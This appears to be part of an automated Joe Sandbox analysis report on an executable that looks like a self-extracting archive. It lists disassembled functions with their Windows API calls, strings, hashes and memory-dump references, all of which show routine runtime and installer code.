                                                                      • Opcode ID: 6d7e1ee9f718ab5a891652ba4e8263087ae3084230056b81f8549d5529c4167e
                                                                      • Instruction ID: a8d0b6fb79c2cd0f9eb009f76f0014353a94c9be8b06e422429eb395cc7d174c
                                                                      • Opcode Fuzzy Hash: 6d7e1ee9f718ab5a891652ba4e8263087ae3084230056b81f8549d5529c4167e
                                                                      • Instruction Fuzzy Hash: 16F1E870604380DBDB25EB2484A9FFA77D96F90300F08056DED8A9B283DB6C9946C776
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: </p>$</style>$<br>$<style>$>
                                                                      • API String ID: 176396367-3568243669
                                                                      • Opcode ID: 137c703b65848d1e78ce12f85976cfac751e971e4aa6f6bb607a135c8bf2b628
                                                                      • Instruction ID: e175d5ec7f31e635867b66eed786114812c5e7e0c6e0fbd5ae4e0d8fd15ce9ec
                                                                      • Opcode Fuzzy Hash: 137c703b65848d1e78ce12f85976cfac751e971e4aa6f6bb607a135c8bf2b628
                                                                      • Instruction Fuzzy Hash: 7151D467741322A5DB309A25981177673F2DFA5750F69042BFBC18B3C0FB6D8D8182A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,007EFE02,00000000,00000000,00000000,00000000,00000000,007E529F), ref: 007EF6CF
                                                                      • __fassign.LIBCMT ref: 007EF74A
                                                                      • __fassign.LIBCMT ref: 007EF765
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 007EF78B
                                                                      • WriteFile.KERNEL32(?,00000000,00000000,007EFE02,00000000,?,?,?,?,?,?,?,?,?,007EFE02,00000000), ref: 007EF7AA
                                                                      • WriteFile.KERNEL32(?,00000000,00000001,007EFE02,00000000,?,?,?,?,?,?,?,?,?,007EFE02,00000000), ref: 007EF7E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: 4a6a72b02ff7bf01dc95aa15dff39dbeb294efba369cda0a2452161a7b63f168
                                                                      • Instruction ID: e48f48053c9f07ecff745d323b5e1433c60cb3e5eca2e22eac9fdb2f5c35fe64
                                                                      • Opcode Fuzzy Hash: 4a6a72b02ff7bf01dc95aa15dff39dbeb294efba369cda0a2452161a7b63f168
                                                                      • Instruction Fuzzy Hash: 3351A3B1901249AFDB10CFA9DC85AEEBBF8FF0D300F14416AE555E7251E634AA41CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DCE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000800,?), ref: 007DCE9D
                                                                        • Part of subcall function 007CB690: _wcslen.LIBCMT ref: 007CB696
                                                                      • _swprintf.LIBCMT ref: 007DCED1
                                                                        • Part of subcall function 007C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007C40A5
                                                                      • SetDlgItemTextW.USER32(?,00000066,0080946A), ref: 007DCEF1
                                                                      • _wcschr.LIBVCRUNTIME ref: 007DCF22
                                                                      • EndDialog.USER32(?,00000001), ref: 007DCFFE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
                                                                      • String ID: %s%s%u
                                                                      • API String ID: 689974011-1360425832
                                                                      • Opcode ID: 83ada020dbd52f4973349f32d2f76de5e036ff697f303e68126124e598fc0911
                                                                      • Instruction ID: 34810574475d1ffb07bf8634030006606705865a152c7c7e5ffa322a23683317
                                                                      • Opcode Fuzzy Hash: 83ada020dbd52f4973349f32d2f76de5e036ff697f303e68126124e598fc0911
                                                                      • Instruction Fuzzy Hash: 8D4191B1900659EADF219B60CC45FEA77BCEB04301F4080A7FA49E7251EE788E44CF66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 007E2937
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 007E293F
                                                                      • _ValidateLocalCookies.LIBCMT ref: 007E29C8
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 007E29F3
                                                                      • _ValidateLocalCookies.LIBCMT ref: 007E2A48
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: 8ec41694b42a109ca12d3006b3de1afa774145c8f0aae533b014fab8a5cc5a2e
                                                                      • Instruction ID: 5caf0af75db1bb60738c607a1b64a8f08a23897722d48b9354091ad62451bf0c
                                                                      • Opcode Fuzzy Hash: 8ec41694b42a109ca12d3006b3de1afa774145c8f0aae533b014fab8a5cc5a2e
                                                                      • Instruction Fuzzy Hash: 3D41CA30A01288DFCF10DF69C849AAE7BB9AF48314F14C065E8156B353D779EA52CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                      • API String ID: 176396367-3743748572
                                                                      • Opcode ID: 355a7f8d820f19e3f502cd3cd27574075dda6c0c6155a7ac5d05eb74ef64e7ac
                                                                      • Instruction ID: 1178552f33b37a2d2f8c1418d084691d928134a753b1ad9254e2496489f37587
                                                                      • Opcode Fuzzy Hash: 355a7f8d820f19e3f502cd3cd27574075dda6c0c6155a7ac5d05eb74ef64e7ac
                                                                      • Instruction Fuzzy Hash: 3531296364434596DA30AB959C46B7B73B4EBD0720F50841FF68697380FA6CAD41C3A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007EC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007EC868: _free.LIBCMT ref: 007EC891
                                                                      • _free.LIBCMT ref: 007EC8F2
                                                                        • Part of subcall function 007E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?), ref: 007E8DE2
                                                                        • Part of subcall function 007E8DCC: GetLastError.KERNEL32(?,?,007EC896,?,00000000,?,00000000,?,007EC8BD,?,00000007,?,?,007ECCBA,?,?), ref: 007E8DF4
                                                                      • _free.LIBCMT ref: 007EC8FD
                                                                      • _free.LIBCMT ref: 007EC908
                                                                      • _free.LIBCMT ref: 007EC95C
                                                                      • _free.LIBCMT ref: 007EC967
                                                                      • _free.LIBCMT ref: 007EC972
                                                                      • _free.LIBCMT ref: 007EC97D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                      • Instruction ID: 7c41937d71238f93dd734ca419f1f2e4a14727cd74c989d4485f7d8ca8f96722
                                                                      • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                      • Instruction Fuzzy Hash: 9C114271582784E6E521F773CD0FFCB7BAC9F0CB00F440C15B29D66092DA69B5068791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,007DE669,007DE5CC,007DE86D), ref: 007DE605
                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 007DE61B
                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 007DE630
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                      • API String ID: 667068680-1718035505
                                                                      • Opcode ID: 37e9b883c3207cd8bf0778ce2d6387ded7b840ffa359a4c3431aa12639b9d504
                                                                      • Instruction ID: 2dc74a9d2503eba20015b72a315d1a406b4c208640e08527badb11271dea73b1
                                                                      • Opcode Fuzzy Hash: 37e9b883c3207cd8bf0778ce2d6387ded7b840ffa359a4c3431aa12639b9d504
                                                                      • Instruction Fuzzy Hash: 63F0C2757812225B4F336EB49C8857A23FAAB35751310443BDA05DB300EB1CCD559A94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007D146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D14C2
                                                                        • Part of subcall function 007CB146: GetVersionExW.KERNEL32(?), ref: 007CB16B
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007D14E6
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 007D1500
                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 007D1513
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1523
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D1533
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                      • String ID:
                                                                      • API String ID: 2092733347-0
                                                                      • Opcode ID: 1665d6d63d394be1761cfc0cd32357819b3c45cf112195961e0d600793681b3d
                                                                      • Instruction ID: 31432dfde82c2e7688baf806bd0ecaecb94c8d6f52fc35b8dae0488a87c8d269
                                                                      • Opcode Fuzzy Hash: 1665d6d63d394be1761cfc0cd32357819b3c45cf112195961e0d600793681b3d
                                                                      • Instruction Fuzzy Hash: 6C31E875108349ABC704DFA8D88499BB7F8FF98714F448A1EF995C3210E734D649CBAA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,007E2AF1,007E02FC,007DFA34), ref: 007E2B08
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007E2B16
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007E2B2F
                                                                      • SetLastError.KERNEL32(00000000,007E2AF1,007E02FC,007DFA34), ref: 007E2B81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: 9960e2963302e6cdbab06e34defc1903099593f950457435a521bdaded99a98f
                                                                      • Instruction ID: c6383231ac5d665c3aa453e4d29902961a8e72b18d8b5e12cf1e2c797f8a4064
                                                                      • Opcode Fuzzy Hash: 9960e2963302e6cdbab06e34defc1903099593f950457435a521bdaded99a98f
                                                                      • Instruction Fuzzy Hash: 0601F17220B351AEA6242A766C8D9362B4EEB09778720433AF0105A0F2FF9D5C02D258
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007E97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,00801098,007E4674,00801098,?,?,007E40EF,?,?,00801098), ref: 007E97E9
                                                                      • _free.LIBCMT ref: 007E981C
                                                                      • _free.LIBCMT ref: 007E9844
                                                                      • SetLastError.KERNEL32(00000000,?,00801098), ref: 007E9851
                                                                      • SetLastError.KERNEL32(00000000,?,00801098), ref: 007E985D
                                                                      • _abort.LIBCMT ref: 007E9863
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID:
                                                                      • API String ID: 3160817290-0
                                                                      • Opcode ID: 78a8e5858459ec53ee836616f8508ecd4eaec48b84999048370634b403a3d2eb
                                                                      • Instruction ID: 4ff47f4c2ed0f7dc37d9090d8d93e758cc55c589957bff716d92d12b8305c308
                                                                      • Opcode Fuzzy Hash: 78a8e5858459ec53ee836616f8508ecd4eaec48b84999048370634b403a3d2eb
                                                                      • Instruction Fuzzy Hash: 9CF02837202681F6C75273377C0EA2B1B66DFDE770F244124F728962F2EE2C8801816A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 007DDC47
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007DDC61
                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007DDC72
                                                                      • TranslateMessage.USER32(?), ref: 007DDC7C
                                                                      • DispatchMessageW.USER32(?), ref: 007DDC86
                                                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 007DDC91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                      • String ID:
                                                                      • API String ID: 2148572870-0
                                                                      • Opcode ID: 4b9bfb3a891ba860a4194bd37e90f71e75e414d08f187f89e8894bc3c550c622
                                                                      • Instruction ID: cb6a51371c22ab67647b99f3fc502d8a2d412afa28246b626086d47c348010cb
                                                                      • Opcode Fuzzy Hash: 4b9bfb3a891ba860a4194bd37e90f71e75e414d08f187f89e8894bc3c550c622
                                                                      • Instruction Fuzzy Hash: FAF03C72A01219BBCB306BA5DC4CDDB7F7DEF41791F008112B50AD2050D6788646CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007DA80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007DA699: GetDC.USER32(00000000), ref: 007DA69D
                                                                        • Part of subcall function 007DA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 007DA6A8
                                                                        • Part of subcall function 007DA699: ReleaseDC.USER32(00000000,00000000), ref: 007DA6B3
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 007DA83C
                                                                        • Part of subcall function 007DAAC9: GetDC.USER32(00000000), ref: 007DAAD2
                                                                        • Part of subcall function 007DAAC9: GetObjectW.GDI32(?,00000018,?), ref: 007DAB01
                                                                        • Part of subcall function 007DAAC9: ReleaseDC.USER32(00000000,?), ref: 007DAB99
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectRelease$CapsDevice
                                                                      • String ID: "}$($A}
                                                                      • API String ID: 1061551593-398561874
                                                                      • Opcode ID: df826251b695f65be43b5ab20ea560450d5b399a5524a1eff74084195d662289
                                                                      • Instruction ID: 96db7fee1228d9d89c74359b0c9da304b7a4bca49d4795137c7870f313e596e6
                                                                      • Opcode Fuzzy Hash: df826251b695f65be43b5ab20ea560450d5b399a5524a1eff74084195d662289
                                                                      • Instruction Fuzzy Hash: B591D175608354AFD620DF25C84492BBBF9FFC9711F00891EF99AD3260DB34A946CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 007CC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 007D05DA: _wcslen.LIBCMT ref: 007D05E0
                                                                        • Part of subcall function 007CB92D: _wcsrchr.LIBVCRUNTIME ref: 007CB944
                                                                      • _wcslen.LIBCMT ref: 007CC197
                                                                      • _wcslen.LIBCMT ref: 007CC1DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2008645773.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2008619927.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008686649.00000000007F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.00000000007FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000805000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008748201.0000000000822000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2008866926.0000000000823000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7c0000_hT7clR9Gz2.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$_wcsrchr
                                                                      • String ID: .exe$.rar$.sfx
                                                                      • API String ID: 3513545583-31770016
                                                                      • Opcode ID: 4a7866e0daaf8b8b84028639cd1aed45f5405ae8cfad3a87b55801746df362c8
                                                                      • Instruction ID: 2b0e85fedb7eff3860dcaa78b021f4d16c8ae4d9c0b9272200f5d24dba109be7
                                                                      • Opcode Fuzzy Hash: 4a7866e0daaf8b8b84028639cd1aed45f5405ae8cfad3a87b55801746df362c8
                                                                      • Instruction Fuzzy Hash: 2C412562500355D6C733AF34884AF7AB3B8EF41714F18094EF9CA6B281EB6C9D81C391
                                                                      Uniqueness

